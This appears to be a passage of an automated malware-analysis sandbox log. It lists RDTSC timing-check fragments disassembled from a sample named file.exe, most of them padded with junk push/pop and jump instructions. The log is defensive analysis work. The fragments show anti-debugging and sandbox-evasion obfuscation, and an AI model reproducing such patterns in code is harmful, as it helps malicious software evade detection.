                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 464B02 second address: 464B2D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007F25EC6CB8F2h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [eax] 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F25EC6CB8EDh 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 464B2D second address: 464B50 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F25ED41A9F0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d pushad 0x0000000e pushad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push esi 0x00000017 pop esi 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 464B50 second address: 464B54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 464C55 second address: 464CBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 xor dword ptr [esp], 3F58D681h 0x0000000b mov dword ptr [ebp+122D34B7h], esi 0x00000011 push 00000003h 0x00000013 push edi 0x00000014 mov edx, eax 0x00000016 pop edx 0x00000017 push 00000000h 0x00000019 cmc 0x0000001a push 00000003h 0x0000001c or edx, dword ptr [ebp+122D28CDh] 0x00000022 push BD5C10E0h 0x00000027 ja 00007F25ED41A9FCh 0x0000002d jmp 00007F25ED41A9F6h 0x00000032 add dword ptr [esp], 02A3EF20h 0x00000039 mov ecx, 39883721h 0x0000003e lea ebx, dword ptr [ebp+12456826h] 0x00000044 or dword ptr [ebp+122D3725h], edi 0x0000004a xchg eax, ebx 0x0000004b pushad 0x0000004c jbe 00007F25ED41A9ECh 0x00000052 push eax 0x00000053 push edx 0x00000054 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 464DB7 second address: 464DBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 464DBD second address: 464DCA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ebx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 464DCA second address: 464E70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F25EC6CB8EBh 0x00000009 popad 0x0000000a pop ebx 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f jmp 00007F25EC6CB8F1h 0x00000014 mov eax, dword ptr [eax] 0x00000016 jne 00007F25EC6CB8F0h 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 jmp 00007F25EC6CB8F2h 0x00000025 pop eax 0x00000026 push 00000000h 0x00000028 push esi 0x00000029 call 00007F25EC6CB8E8h 0x0000002e pop esi 0x0000002f mov dword ptr [esp+04h], esi 0x00000033 add dword ptr [esp+04h], 00000014h 0x0000003b inc esi 0x0000003c push esi 0x0000003d ret 0x0000003e pop esi 0x0000003f ret 0x00000040 jo 00007F25EC6CB8ECh 0x00000046 mov edx, dword ptr [ebp+122D2959h] 0x0000004c push ecx 0x0000004d pop esi 0x0000004e push 00000003h 0x00000050 sub dword ptr [ebp+122D1802h], ecx 0x00000056 push 00000000h 0x00000058 movzx edx, si 0x0000005b push 00000003h 0x0000005d add dword ptr [ebp+122D180Bh], edx 0x00000063 mov dh, bl 0x00000065 push 87B38EF1h 0x0000006a pushad 0x0000006b ja 00007F25EC6CB8E8h 0x00000071 push eax 0x00000072 push edx 0x00000073 jo 00007F25EC6CB8E6h 0x00000079 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 477928 second address: 47792E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47792E second address: 477938 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F25EC6CB8E6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 483AE8 second address: 483AEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 483AEE second address: 483AF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 483C53 second address: 483C61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F25ED41A9E6h 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 483C61 second address: 483C72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jnl 00007F25EC6CB8E6h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 483C72 second address: 483C76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 483DDD second address: 483DEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F25EC6CB8EBh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 483F62 second address: 483F66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 483F66 second address: 483F72 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F25EC6CB8E6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 483F72 second address: 483F8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F25ED41A9F4h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 483F8C second address: 483F90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 484252 second address: 484257 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 484257 second address: 484267 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jl 00007F25EC6CB8E6h 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 484267 second address: 484273 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F25ED41A9E6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 484273 second address: 484281 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 484281 second address: 484285 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 484285 second address: 484289 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 484289 second address: 4842B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F25ED41A9EAh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jnc 00007F25ED41A9F3h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 484594 second address: 484598 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 484598 second address: 4845A8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a jl 00007F25ED41A9E6h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4845A8 second address: 4845B8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F25EC6CB8EAh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48473D second address: 48475F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F25ED41A9ECh 0x00000009 push eax 0x0000000a push edx 0x0000000b jg 00007F25ED41A9E6h 0x00000011 jmp 00007F25ED41A9EAh 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4848AA second address: 4848AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4848AE second address: 4848B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4853D2 second address: 4853E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007F25EC6CB8F0h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 485942 second address: 485952 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F25ED41A9E8h 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 485952 second address: 485956 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 485956 second address: 48595A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48595A second address: 485968 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d pop edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 485968 second address: 48596E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48596E second address: 485972 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 485972 second address: 485992 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F25ED41A9F8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 485992 second address: 485996 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48809D second address: 4880A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4880A1 second address: 4880C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F25EC6CB8F6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4880C0 second address: 4880C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48B921 second address: 48B939 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jnl 00007F25EC6CB8E6h 0x0000000f jnp 00007F25EC6CB8E6h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48B939 second address: 48B943 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F25ED41A9E6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 490E36 second address: 490E42 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 490E42 second address: 490E48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 490E48 second address: 490E4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 44CDBA second address: 44CDC0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 490292 second address: 4902C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F25EC6CB90Bh 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4902C6 second address: 4902CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49069B second address: 4906A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4906A3 second address: 4906F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F25ED41A9F6h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F25ED41A9F4h 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007F25ED41A9EEh 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d jc 00007F25ED41AA0Fh 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 490A5C second address: 490A60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 490CC4 second address: 490CC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 490CC8 second address: 490CCE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4918D5 second address: 4918D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 491B4D second address: 491B5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007F25EC6CB8ECh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4921D4 second address: 4921D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4921D8 second address: 4921F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F25EC6CB8ECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F25EC6CB8ECh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4924BE second address: 4924C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4924C3 second address: 4924C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4934E4 second address: 4934E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 495B75 second address: 495BB4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push edi 0x0000000a call 00007F25EC6CB8E8h 0x0000000f pop edi 0x00000010 mov dword ptr [esp+04h], edi 0x00000014 add dword ptr [esp+04h], 00000015h 0x0000001c inc edi 0x0000001d push edi 0x0000001e ret 0x0000001f pop edi 0x00000020 ret 0x00000021 mov esi, dword ptr [ebp+122D2B75h] 0x00000027 push 00000000h 0x00000029 or dword ptr [ebp+122D187Ah], ecx 0x0000002f push 00000000h 0x00000031 xchg eax, ebx 0x00000032 push eax 0x00000033 push edx 0x00000034 push edi 0x00000035 jl 00007F25EC6CB8E6h 0x0000003b pop edi 0x0000003c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 495BB4 second address: 495BBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 495BBA second address: 495BBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 495BBE second address: 495BC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 496344 second address: 496366 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F25EC6CB8F8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edi 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 497B47 second address: 497B63 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F25ED41A9F0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007F25ED41A9ECh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C457 second address: 49C478 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jl 00007F25EC6CB8E6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 jmp 00007F25EC6CB8EDh 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C478 second address: 49C47C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C47C second address: 49C480 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49EA5D second address: 49EA64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49EA64 second address: 49EABC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F25EC6CB8F2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F25EC6CB8F3h 0x0000000f nop 0x00000010 jmp 00007F25EC6CB8F1h 0x00000015 push 00000000h 0x00000017 movzx ebx, si 0x0000001a push 00000000h 0x0000001c movzx edi, ax 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 push esi 0x00000023 jmp 00007F25EC6CB8EDh 0x00000028 pop esi 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49DC4F second address: 49DC69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F25ED41A9F6h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49FBF2 second address: 49FC02 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a jo 00007F25EC6CB8E6h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49FC02 second address: 49FC06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49EC55 second address: 49EC67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F25EC6CB8ECh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49FC06 second address: 49FC52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 nop 0x00000008 mov bl, 7Ah 0x0000000a sbb edi, 13F61997h 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push ebx 0x00000015 call 00007F25ED41A9E8h 0x0000001a pop ebx 0x0000001b mov dword ptr [esp+04h], ebx 0x0000001f add dword ptr [esp+04h], 00000015h 0x00000027 inc ebx 0x00000028 push ebx 0x00000029 ret 0x0000002a pop ebx 0x0000002b ret 0x0000002c mov di, 5422h 0x00000030 mov edi, dword ptr [ebp+122D2A01h] 0x00000036 push 00000000h 0x00000038 xor edi, dword ptr [ebp+122D351Bh] 0x0000003e xchg eax, esi 0x0000003f jc 00007F25ED41A9F0h 0x00000045 push eax 0x00000046 push edx 0x00000047 pushad 0x00000048 popad 0x00000049 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0CAA second address: 4A0CBF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F25EC6CB8F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0CBF second address: 4A0CC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49FEEA second address: 49FEF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D452B second address: 4D4538 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jo 00007F25ED41A9E6h 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D483A second address: 4D4841 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D4841 second address: 4D486B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jno 00007F25ED41AA01h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 44E859 second address: 44E862 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D85A3 second address: 4D85A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D85A7 second address: 4D85AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D86FD second address: 4D8703 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D8703 second address: 4D8707 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA893 second address: 4DA8AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F25ED41A9E6h 0x00000009 jmp 00007F25ED41A9EDh 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA8AE second address: 4DA8B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA8B4 second address: 4DA8B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
